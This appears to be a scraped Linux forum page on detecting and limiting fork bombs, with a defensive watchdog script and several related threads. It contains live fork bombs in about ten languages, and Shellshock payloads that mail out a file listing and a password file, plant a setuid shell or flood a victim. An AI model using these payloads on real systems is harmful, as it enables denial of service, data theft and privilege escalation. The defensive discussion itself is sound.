Fork-bomb detection

I run a server that I use when I give an "intro to bash" workshop at my school.
I allow a guest user to log in; but a "smart" user, or one aware of fork-bombing, could easily detonate one on my server. I have the limits for the guest user set pretty tight, so they really can't do any damage.
I was just wondering if there was a way to actually detect a fork-bomb detonation?

ivoarch wrote:
Try limiting the number of processes.
http://linuxmafia.com/faq/VALinux-kb/pr … -user.html
https://wiki.archlinux.org/index.php/Re … management
$> cat /etc/security/limits.conf
* hard nproc 1000
Yeah, I know how to protect against it, but it would be nice if I could somehow detect when it's going on.
If there were some kind of tool that could monitor the rate of new processes spawned by a user, and flag when it goes above a certain threshold, then we'd know it's some kind of bad program or a bomb.
Google is no help though.
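For what it's worth, here is a rough sketch of such a watchdog in plain bash: it samples per-user process counts with ps on an interval and logs when a user's count jumps by more than a threshold in one sample. The threshold, interval, and log message are made-up values to tune; a starting point, not a finished tool.
#!/bin/bash
# Sketch: warn when any user's process count grows by more than
# THRESHOLD within one INTERVAL. Both numbers are illustrative.
THRESHOLD=50
INTERVAL=2
declare -A last now
while true; do
    now=()
    while read -r count user; do
        now[$user]=$count
    done < <(ps -eo user= | sort | uniq -c)
    for user in "${!now[@]}"; do
        delta=$(( ${now[$user]} - ${last[$user]:-0} ))
        if (( delta > THRESHOLD )); then
            logger -p auth.warning "possible fork bomb: $user spawned $delta processes in ${INTERVAL}s"
        fi
    done
    last=()
    for user in "${!now[@]}"; do last[$user]=${now[$user]}; done
    sleep "$INTERVAL"
done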

Similar Messages

  • Would Arch survive a "fork bomb?"

    I was reading this on SecurityFocus.com and they mention that RedHat, Gentoo, and Mandrake all crashed.
    http://www.securityfocus.com/columnists … f=rssdebia
    I then proceeded to fork bomb every Unix machine I could get my hands on. My FreeBSD server at home shrugged it off (even after inviting other connected users to try), as did my OpenBSD gateway. This, too, is exactly what I expected to happen.
    Next, I asked several of my associates who use Linux to try it out on their machines, and we didn't have to go far to find more Linux distributions that succumbed to the same painfully effective fork bomb attack. Both Gentoo and Red Hat followed in the footsteps of Mandrake, and each died quicker than you can say "unreasonable default settings." I'll quickly mention here that Debian did not suffer the same fate as the others; congrats to the Debian development team.
    For those who are not aware, let me briefly explain the cause of fork bombing. First, the shell must be configured to operate with what I consider to be unreasonable limits. This itself has nothing to do with the kernel. Second, the kernel must allow many more processes to be created than should be. Since shells often default to the maximum number of processes supported by the kernel, together we have a problem.

    This topic has been discussed here.
    The gist of it is that Arch would not survive a fork bomb, and we need to look into ways to secure Arch from this type of attack.

  • Xcode: fun with fork-bombs

    This isn't a question; just an FYI so that when people search for 'zombie python' in the forums they'll find something.
    I came back from a week-long trip and found hundreds of python zombie processes on my system, for all users [even root].
    Was a bit worried that my machine had been compromised until I saw this:
    http://elliotth.blogspot.com/2006/06/attack-of-mac-python-zombies.html
    It turns out the latest Xcode has a bug which creates many zombie python processes. If you do not reboot frequently, your machine will run out of processes.
    This is caused by the distributed build component; when installed, Xcode launches a daemon to volunteer your machine for distributed builds, regardless of whether you even enable distributed builds [bad Apple! I'm glad I've got a good firewall].
    The fix is simple enough:
    cd /System/Library/LaunchDaemons
    sudo launchctl unload -w com.apple.dnbobserver.plist
    A more in-depth discussion is here:
    http://groups.google.de/group/comp.sys.mac.system/browse_thread/thread/dfc0557a3bdf862c/e8368455c0510120?hl=de
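    If you want to confirm the daemon is actually gone afterwards, something like this should work (assuming the job label matches the plist name):
    sudo launchctl list | grep dnbobserver || echo "dnbobserver not loaded"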

    It would be better if you mentioned exactly which version of Xcode you've got installed. Do you mean 2.4? That's the latest version.

  • Fork bomb... can't log in to gnome-shell

    ok, long story short: a friend of mine sent me a useful shell script that did everything I needed it to do properly, but with the line :(){ :|:& };: appended to it (an April Fools' joke, apparently). I turned the computer off and expected that to be the end of it. I get to GDM and I cannot log in; it authenticates, as in it doesn't say wrong password, but it just goes straight back to GDM.
    I can log in on another terminal.
    I really haven't got a clue what is going on; I'd really appreciate help, as otherwise I will have to install Fedora 16 in a minute. I haven't got time to play about, as I have university deadlines to meet.

    I've had this problem before, when running Ubuntu. See here.
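    If the bomb line got appended to a file that is sourced at login, which would explain the GDM loop, you can hunt it down from the working terminal with something like this (the file list is a guess; adjust for your shell and session setup):
    grep -n ':(){' ~/.bashrc ~/.bash_profile ~/.profile ~/.xinitrc 2>/dev/null
    and delete the offending line.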

  • Restrict user account, prevent intruder from doing bad things

    Hello,
    I am currently planning and setting up a backup-server with ZFS. There will be daily snapshots of the filesystem (cron job).
    Different machines connect automatically without a password via ssh (public/private key) and rsync their stuff to the backup server.
    Each machine will connect as its specific user (and therefore to its own home directory) on the backup server. I thought that if one of the machines gets compromised (e.g. someone gets access to the private key), the attacker could only access one home folder, nothing more. As there are daily snapshots, even if he deletes all the files, they will still be there.
    Is just adding a normal user per machine enough, or should/can more be done to enhance security? As I said, the user account is only for logging in and rsyncing stuff to the home directory.
    E.g. disabling execution of applications other than rsync? Preventing fork bombs? Making it harder to run exploits? Other stuff I didn't think about?
    Thanks
    Last edited by cyberius (2013-02-17 08:23:39)

    -Syu wrote:
    You might also want to limit those user accounts themselves. If you only use them for rsyncing, remove them from all unnecessary user groups (the "users" group in particular) and take away their shells.
    On top of that, you may want to give each user a chroot jail, so they can't even write to /tmp, for example.
    I'm not too familiar with rsync yet. If you really need to make your other machines log in and execute rsync themselves over SSH, you might want to take a look at limited shells like lshell to only allow execution of that program.
    Great, thank you! This was something I was looking for!
    But if I take away the shell completely (e.g. chsh -s /sbin/nologin username), I won't be able to rsync via ssh, right?
    lshell sounds very promising for my case, I will have a look at it!
    edit: I found out that there is also a "--restricted" option for bash, which disables things like changing directories and modifying PATH. I will have a look.
    Last edited by cyberius (2013-02-18 10:14:36)
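    One more option in this vein is the rrsync helper script that ships with rsync (its path and supported flags vary by distro, so treat this as an illustrative sketch). A forced command in authorized_keys pins the key to a single rsync invocation and disables everything else:
    # one line in ~backupuser/.ssh/authorized_keys, wrapped here for readability:
    command="/usr/lib/rsync/rrsync /home/backupuser/backup",no-pty,no-port-forwarding,no-agent-forwarding,no-X11-forwarding ssh-ed25519 AAAA... backup-client
    This restricts the key to rsync transfers rooted at the given directory and turns off ttys and forwarding, which covers much of the above without a full chroot.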

  • Large number of lwp_suspend calls.

    Hi,
    i have a sample test program which moves files between directories. The code is pasted below.
    The mv is taking more time on one of the servers compared to others.
    A truss reveals an unusually high number of lwp_suspend syscalls on the problematic server.
    What could be the reason for this? How can we troubleshoot it?
    import java.io.File;
    import java.util.Calendar;
    import java.util.Date;

    public class Test {
        /**
         * @param args InputDir OutputDir
         */
        public static void main(String[] args) {
            if (args.length != 2) {
                System.out.println("Usage::  InputDir OutputDir ");
                return;
            }
            String commandEx;
            String inDir = args[0];
            File inDirFile = new File(inDir);
            String outDir = args[1];
            while (true) {
                File[] files = inDirFile.listFiles();
                if (files.length != 0) {
                    System.out.println("No of files = " + files.length);
                    Date startTime = Calendar.getInstance().getTime();
                    System.out.println("Time before moving files is: " + startTime);
                    for (int j = 0; j < files.length; j++) {
                        commandEx = "/bin/mv " + files[j] + " " + outDir;
                        Runtime rt = Runtime.getRuntime();
                        Process result = null;
                        try {
                            result = rt.exec(commandEx);
                            result.waitFor();
                        } catch (Exception e) {
                            System.out.println("Encountered exception while trying to copy files");
                        }
                        if (result != null && 0 != result.exitValue()) {
                            System.out.println("Failed to copy file");
                        }
                    }
                    Date endTime = Calendar.getInstance().getTime();
                    System.out.println("Time after moving all the files: " + endTime);
                    long diff = endTime.getTime() - startTime.getTime();
                    System.out.println("Time to move: " + diff / 1000 + " secs");
                } else {
                    System.out.println("No files in the input directory");
                    return;
                }
            }
        }
    }

    Quite frankly, I'm surprised this code isn't causing a noticeable headache on all your machines, not just one of them. It's hard to imagine they are all the same kind of system, with comparable loads, but only one is struggling with this task.
    How many CPUs on the system? If your load averages, as shown in the prstat output you gave, exceed the number of CPUs, the box in question is probably saturated.
    I'd first be curious how many LWPs are attributable to the Java process itself. I'm finding it hard to take my eyes off this section:
                        for (int j = 0; j < files.length; j++) {
                             commandEx = "/bin/mv " + files[j] + " " + outDir;
                             Runtime rt = Runtime.getRuntime();
                             Process result = null;
    The code launches a separate /bin/mv process for every file. That can scale to fork-bomb status depending on the number of files you're moving. And since each mv runs as its own process, it's going to fight all the other concurrent processes for access to the target directory's lock in order to place and record its file entry safely. The many lwp_suspend calls may be attributable to all but one of those processes being told to wait until the directory lock is freed by the current owner.
    It would be good on all systems to economize here. Why this approach would afflict one system but not others that are effectively the same is a puzzler.
    I'd suggest looking at prstat -L, but with 16k+ LWPs it's going to output a small phonebook of entries.
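    For comparison, a minimal sketch of the same loop done in-process with java.nio (Java 7+), so no subprocess is forked per file; the class name and error handling are kept deliberately simple:
    import java.io.IOException;
    import java.nio.file.*;

    public class MoveFilesInProcess {
        public static void main(String[] args) throws IOException {
            if (args.length != 2) {
                System.out.println("Usage::  InputDir OutputDir ");
                return;
            }
            Path inDir = Paths.get(args[0]);
            Path outDir = Paths.get(args[1]);
            try (DirectoryStream<Path> files = Files.newDirectoryStream(inDir)) {
                for (Path f : files) {
                    // same-filesystem rename where possible; no /bin/mv subprocess
                    Files.move(f, outDir.resolve(f.getFileName()),
                            StandardCopyOption.REPLACE_EXISTING);
                }
            }
        }
    }
    On a pre-7 JVM, java.io.File.renameTo does the same job within one filesystem.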

  • Maxuprc

    My server has a maxuprc of 29k and it hit an issue with memory.
    I was told by a system admin that if I reduce maxuprc (the maximum number of processes per user), the server will be more stable.
    Could you tell me the advantages, if any, of reducing the maxuprc limit to 5k?
    Thanks,
    Shyam

    shyam252 wrote:
    My server has a maxuprc of 29k and it hit an issue with memory.
    I was told by a system admin that if I reduce maxuprc (the maximum number of processes per user), the server will be more stable.
    Could you tell me the advantages, if any, of reducing the maxuprc limit to 5k?
    Thanks,
    Shyam

    Hi Shyam,
    I set my login server's maxuprc to 1024 and that has been fine for the last 10 years.
    We had a problem with runaway jobs, a bit like a fork bomb, and setting maxuprc to 1024 stopped the system from locking up for other users and allowed me to kill the rogue user's jobs :-)
    Cheers
    Richard

  • LXDE: complete clean-up

    Hi,
    I've got a weird problem: LXDE is unworkable on login. The desktop is there, but it flutters as if there were a fork bomb in a GUI element. I tried deleting everything in /etc/xdg/ and ~/.config and reinstalling; the first login is good, then the flutter returns. As the wallpaper survived my cleanup, I think there's some configuration left over. Is there a way to do a really clean reinstall?

    falconindy wrote: Make a new user.
    It's worth trying to reproduce it that way. You can then, step by step, copy (or symlink) local user dirs (like .cache etc.) into the new user's home dir until the problem reoccurs. If it doesn't, your problem lies somewhere else.
    A big advantage of reproducing it this way is that you can make a sound bug report to the programmers. That's open-source contribution too, you know
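    A concrete way to do that bisection, assuming root and a throwaway account (the user names and starting directory are just examples):
    useradd -m lxdetest
    mkdir -p ~lxdetest/.config
    cp -r ~olduser/.config/lxsession ~lxdetest/.config/
    chown -R lxdetest:lxdetest ~lxdetest/.config
    # log in as lxdetest after each copied dir; the dir that brings the
    # flutter back is the culprit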

  • Why can Finder not open?

    Message: Application Finder can't be opened. What causes this?

    Try a restart.
    If this happens often, and you get an "error 10810" message, it may be a problem with the process table being full. See http://www.thexlab.com/faqs/error-10810.html for a detailed explanation.
    As it notes, one possible cause is a "fork bomb" (I love that term), probably in a 3rd-party app.
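    You can also check how full the process table actually is from Terminal (the limits vary by machine and OS version):
    sysctl kern.maxproc kern.maxprocperuid   # system-wide and per-user process limits
    ps -ax | wc -l                           # rough count of current processes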

  • Are there any updates to OSX for the "Bash" virus?

    When will there be an update to combat the "Bash" virus?

    You are actually completely wrong; a malicious website could do anything from sending a fork bomb to your computer to opening a shell and controlling your computer completely. Examples from Stack Exchange:
    With access to bash, even from the POV of a web user, the options are endless. For example, here's a fork bomb:
    () { :; }; :(){ :|: & };:
    Just put that in a user agent string on a browser, go to your web page, and instant DoS on your web server.
    Or, somebody could use your server as an attack bot:
    () { :; }; ping -s 1000000 <victim IP>
    Put that on several other servers and you're talking about real bandwidth.
    Other attack vectors:
    # theft of data
    () { :; }; find ~ -print | mail -s "Your files" [email protected]
    () { :; }; cat ~/.secret/passwd | mail -s "This password file" [email protected]
    # setuid shell
    () { :; }; cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash
    There's endless other possibilities: reverse shells, running servers on ports, auto-downloading some rootkit to go from web user to root user. It's a shell! It can do anything. As far as security disasters go, this is even worse than Heartbleed.
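    To check whether your bash is affected, the widely circulated test is the following; a patched bash prints only "this is a test", while a vulnerable one also prints "vulnerable":
    env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'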

  • Parallel processing on multiple IdM instances -- real enterprise class

    Hi all. We run what we earnestly hoped would be a true enterprise class IdM v6 SP1 installation: 2x v440 Sol9 app servers each with 2 IdM instances (AS virtual servers), each host dual CPU and 4GB RAM available; connected to a 4 node dual CPU Oracle RAC cluster.
    But our performance, to use a technical term, sucks bollocks, and has done for >12 months. The main area where this hurts is when we run a DBTable ActiveSync process to update the user base and any associated resources.
    We suspect a few things, but ultimately the most frustrating and intractable problem is this: IdM processes all the Update User tasks stemming from the ActiveSync poll one by one, sequentially, in series, and all on the originating IdM instance. So if we have, say, 5000 updates to process, we watch 5000 sequential User Update tasks, one after the other. Even if each task takes only a couple seconds, we often notice inexplicable gaps of many seconds between one sequential task completing (start time + execution time) and the next beginning. The end result is a throughput rate of usually less than 300/hr -- more than 10hrs to process those 5000 updates!
    Despite setting the [custom] Update User wf to execMode='async', IdM seems to refuse to run these tasks in parallel. In an installation of this size and resource capacity, this is excruciating. Plus there's the fact that as I write, and as it crawls along, the IdM instance running the tasks is showing up in prstat like this:
    PID USERNAME SIZE RSS STATE PRI NICE TIME CPU PROCESS/NLWP
    28946 sentinel 2583M 2379M cpu3 28 0 87:27:53 25% appservd/177
    That's quite a lot of resource-use for not a lot of outcome...
    So, does anyone know: how can we get these tasks to run in parallel rather than sequentially, and how can we get the task load spread across all 4 available IdM instances rather than just the one that executed the ActiveSync poll?
    In long suffering desperation, any help greatly appreciated!
    PS - 2 things regarding parallel:
    1. on the TaskDefinition for the Update User wf, there is also an attribute named 'syncControlAllowed' -- anyone know what this means/does? Would setting it to 'false' perhaps give us true async/parallel mode?
    2. I suspect forcing the task into background could potentially give parallel behaviour, but the problem is that Update User is of course called by any user update task, and when done interactively the administrator may not wish to have the task run in the background.

    Hi,
    i'm afraid i don't know an easy answer to your question. But there are several things that should be considered:
    1) 12s average update time seems a lot. I'm sure that can be optimized. Have you thought about a dedicated sync form (assigned to the proxy admin used for ActiveSync)? If you have that, you might also consider setting viewOptions.Process there to use a simplified workflow optimized for your sync process. Take a look at the dynamic tabbed user form example as well - some of the resources you have may not be subject to synchronization, and those should be ruled out by setting the sync form's "TargetResources" property to an appropriate value.
    2) I recently found an interesting way of parallelizing tasks. This is potentially dangerous, as you have to build in something that prevents it from becoming a "fork bomb". Still, here is some example code for a simple scenario where you just want to sync global.email, populated by your AS form. If the workflow consisted of "start", "nonblocking task launch" and "end", the "nonblocking task launch" would have an action like:
    <Action id='0'>
        <expression>
          <block>
            <defvar name='session'>
              <invoke name='getLighthouseContext'>
                <ref>WF_CONTEXT</ref>
              </invoke>
            </defvar>
            <defvar name='tt'>
              <new class='com.waveset.object.TaskTemplate'>
                <invoke name='getObject'>
                  <ref>session</ref>
                  <s>TaskDefinition</s>
                  <s>Nonblocking Workflow</s>
                  <map/>
                </invoke>
              </new>
            </defvar>
            <invoke name='setSubject'>
              <ref>tt</ref>
              <invoke name='getSubject'>
                <ref>session</ref>
              </invoke>
            </invoke>
            <invoke name='setVariable'>
              <ref>tt</ref>
              <s>accountId</s>
              <ref>user.waveset.accountId</ref>
            </invoke>
            <invoke name='setVariable'>
              <ref>tt</ref>
              <s>email</s>
              <ref>user.global.email</ref>
            </invoke>
            <invoke name='runTask'>
              <ref>session</ref>
              <ref>tt</ref>
            </invoke>
          </block>
        </expression>
    </Action>
    The workflow "Nonblocking Workflow" would then have accountId and email available in its variables, and if it is defined as "async" it will really be launched that way - build in something that prevents your system from exploding...
    3) Probably safer than what I implied in 2) (I only used it for a totally different task that cannot explode): you could consider having several instances of the database table resource adapter. Let's say your primary key in the db is "employeeId". If you define four separate resources, each handling only employeeIds in one residue class modulo 4, you can distribute the load among your cluster. I did a similar thing with FlatFileActiveSync before.
    4) Back to the average 12s again. If you don't have some slow resources, this could mean that the parallel resource limit is kicking in. Take a look at waveset.properties for limits like this.
    Synchronization is not the out-of-the-box strength of IdM - but with some optimization you should be able to get reasonable results.
    Regards,
    Patrick

  • Memory Randomization - Linux default configuration

    Hi,
    lately I've been wondering if the Linux kernel has any ASLR (Address Space Layout Randomization) enabled by default. I know that PaX and grsecurity are in vanilla, but I've also read that by enabling these you will run into problems with X, MPlayer etc. Considering that exploits are made much, much harder when the bad guy doesn't know where his code is located in the heap, I presume that it would be worthwhile to use this technology as many of the modern exploits especially target applications the user uses to interact with the internet.
    On a similar note, is the NX bit being used by default?
    So, what's the current status and what does the near future look like?
    Edit: Of course I meant the heap, not stack. Fixed, thanks dyscoria.
    Last edited by tkdfighter (2009-03-27 14:06:36)

    So I did some reading on Wikipedia. grsecurity actually bundles PaX. Also, since version 2.6.12, the kernel has had a weak form of ASLR enabled by default, as does OS X. Windows Vista has a more complete implementation. Reading this, it appears that the weak OS X implementation is not really sufficient. Miller doesn't really make a statement about Linux, but I assume you could argue that the same goes for Linux.
    I can see though that PaX is not in vanilla, contrary to what I first thought, and that it doesn't support the most recent kernels.
    Another question: why isn't there any protection against simple fork bombs in Arch by default? There is no distribution I know of that has nproc set in limits.conf by default. Some basic things like this would be kind of nice, as I'm sure there are a lot of trivial settings to improve security that I and other users don't know about.
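    On the status question, you can query both settings on a running kernel yourself (standard Linux procfs paths):
    cat /proc/sys/kernel/randomize_va_space   # 0 = off, 1 = stack/mmap/vdso, 2 = also heap (brk)
    grep -m1 -ow nx /proc/cpuinfo             # prints "nx" if the CPU's NX bit is available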

  • /usr/bin binaries automatically executed?

    "Houston, we have a problem"
    I've put in /usr/bin/ a simple script, /usr/bin/pumount (I moved the original pumount to pumount_normal).
    the pumount content is this:
    #!/bin/bash
    pumount_normal "$1"
    notify-send -i drive-removable-media 'USB storage device removed: ' "$1"
    echo media_removed > /dev/vc/1
    the problem is that it is AUTOMATICALLY launched at every startup, so (I suppose) everything in /usr/bin/ is launched on startup...
    (I have noteo notify me of the notify-send launch, and "media_removed" appears on my vc1)
    and this happens for some other script "folders" too... (I tried /usr/sbin too)
    now, maybe this is totally normal and I'm simply stupid (:P), but /usr/bin contains 1140 files on my system....
    I'm not sure why this happens, and I reinstalled Arch one month ago, so I don't think I've already broken it << (I hope, at least...)
    Tell me if you experience this issue too, and whether it's an issue at all...
    Thanks for the attention..
    bye

    sniffles wrote:
    _Marco_ wrote:@sniffles
    why should my system call "pumount" without args at boot?
    I think obviously there is a problem; the point is: is it only me, or every Archer?
    I have no idea why; I don't have that particular thing on my system. Now that iphitus gave you a reason, my scenario does not seem so laughable, does it? A lot more credible than "omg my system runs everything in /usr/bin/ on every boot!" (do you even realise what that would do?)
    well, did you have any idea before iphitus pointed this out?
    I just had my script executed on every boot and I couldn't find any reason for it...
    I realise what that would do, but if I don't understand something I study it (I tried to get it to work for two hours) and, if I still don't understand, I ask someone more expert.
    excuse me if I chose this forum... I didn't know it was a philosophy forum; I thought it was the Arch Linux forum.
    edit:
    as for the fork bomb, it was more a "demonstrative" thing than anything else... (the "aim" was more important than the "result")
    if I had wanted to crash his computer, I would have tested it on my box first... don't you think?
    anyway, this is not the point.
    next time I ask something stupid, please simply start reading another topic.
    Nobody needs that kind of help.
    Last edited by _Marco_ (2008-06-09 10:16:26)

  • Why does this make *nix crash?

    why does
    :(){ :|:& };:
    make my system crash?
    * Don't try it if you don't want to crash your box

    :(){:|:&};:
    can also be viewed as (using a readable name in place of ":"):
    bomb() {
        bomb | bomb &
    }
    bomb
    Does this look more familiar? It's basically a standard bash function definition. The code you posted, called a fork bomb, creates a bash function called ":" which calls itself recursively twice through a pipe and sends the recursive call to the background. Basically, this causes the process to fork (or split) itself forever. This creates a huge number of processes which overrun your CPU, causing your precious computer to freeze/crash/whatever.
    Sending the second function call to the background causes the calling function not to wait until the call returns. Without the ampersand, since there is no stop condition for the recursion, the function would simply wait forever, and you could kill it and all its children with ^C. With the recursive call running in the background, the calling function instead completes immediately, making it damn near impossible to kill its child processes.
    So why call it twice? Because the calling process dies as soon as it makes the backgrounded recursive call. Hence, if we only called it once, there would always be just one process replacing its parent, defeating the purpose of a fork bomb.
    What's the point? It's a denial of service attack, plain and simple.
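    If you want to watch one go off without taking the box down, one trick is to cap the process count in a throwaway subshell first. The number is arbitrary, and in principle the clones just fail with "fork: Resource temporarily unavailable" instead of saturating the machine; still, use a test box:
    ( ulimit -u 100; :(){ :|:& };: )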
    Various other types of fork bombs...
    Windows
    %0|%0
    -or-
    :s
    start %0
    %0|%0
    goto :s
    Perl
    fork while fork
    Haskell
    import Control.Monad
    import System.Posix.Process
    forkBomb = forever $ forkProcess forkBomb
    Python
    import os
    while True:
        os.fork()
    Ruby
    loop { fork }
    C/C++
    #include <unistd.h>
    int main(void)
    {
        while (1)
            fork();
        return 0;
    }
    NASM
    section .text
    global _start            ; entry point
    _start:
    push byte 2              ; 2 = Linux fork() syscall number
    pop eax                  ; EAX = 2 (push/pop avoids NUL bytes in shellcode)
    int 0x80                 ; invoke the syscall: fork
    jmp short _start         ; loop back and fork again, forever
    Lisp
    (defmacro wabbit ()                ;; A program that writes code.
      (let ((fname (gentemp 'INET)))
        `(progn
           (defun ,fname ()            ;; Generate.
             nil)
           (wabbit))))
    (wabbit)                           ;; Start multiplying.
    * Disclaimer: It's not my fault if you fuck up your system trying these out.
    ** Edit: Wow... in the time it took me to write that up a crapload of people answered the question... oh well.
    Last edited by Ghost1227 (2009-06-21 14:02:55)

  • Incorrect resolutions for 16:10 external displays, unable to detect 16:9

    Hey there all, this is my first post here. It looks like some people have had similar issues—particularly with an incomplete/incorrect list of resolutions being provided for external displays.
    I am shopping around for an external display for my MacBook (my specs are included) and I tested a few different ones today, but encountered problems.
    - On a 22" ASUS monitor (sorry I don't have the model) using Mini-DVI to VGA, the native resolution (I assume 1680x1050) is not available, and most resolutions offered are 4:3 ratio (1600x1200 worked). The highest widescreen resolution listed was 1280x768.
    - Next I tried a 19" ASUS, this time 16:9, but the monitor would not display at all. The MacBook display would go blue as normal but then flicker, as if it could not detect the display. This also happened with a 24" BENQ monitor (also 16:9).
    Wondering whether or not this was a problem with using VGA, I then bought a Mini-DVI to DVI adapter and tried again on the 19" and 24" (the 22" ASUS did not have a DVI-in) but the same flickering blue screen appeared, with nothing displayed on the monitor.
    These were my thoughts:
    1. My firmware is not up-to-date. I check in System Profiler and am running Boot ROM Version MB41.00C1.B00 and SMC Version (system): 1.31f0. These are definitely up-to-date for my model MacBook.
    2. Drivers are out of date. This does not seem likely as I am running OS X 10.5.7.
    Other than that, I am at a loss! I haven't yet forked out the $49 for phone support with Apple; that will be my next step.
    Has anyone had this problem, or any ideas what I can try? Short of buying a new Unibody MacBook, of course.
    Thanks guys, hope you can help. Just let me know if you need more info about my computer.

    It's unusual to strike out like that with three different monitors using two different adapters. On the other hand, with all the video issues that have been reported by others on these forums since the 10.5.7 update, it's not too surprising.
    Is a 10.5.6 downgrade a possibility for you? For example, do you use Time Machine and can you in that case revert to a previous time when the MB was running 10.5.6? Perhaps that's not a great suggestion, but it would be something to try.
    There is some remote chance, though somewhat unlikely given that three different monitors are involved, that the extended display identification data (EDID) in each monitor is bad or incomplete. If you care to investigate that possibility, there is a program called SwitchResX that allows you to snoop a monitor's EDID and turn it into a human-readable text file.
    One final suggestion would be to try yet one more monitor to see if any monitor can return a good result. One obvious choice would be an Apple monitor. If there is trouble when trying to connect to an Apple monitor, then that would certainly point to some problem in the MB's configuration or hardware. And not to cast aspersions on the brands you have already tried, but try another brand (if not Apple) that is perhaps more mainstream and known to be more Mac compatible and less firmly in the PC camp where plug-and-display drivers have never mattered very much and are very often botched by the monitor makers. Dell, Samsung and LG are three big brands that come to mind. Good luck.
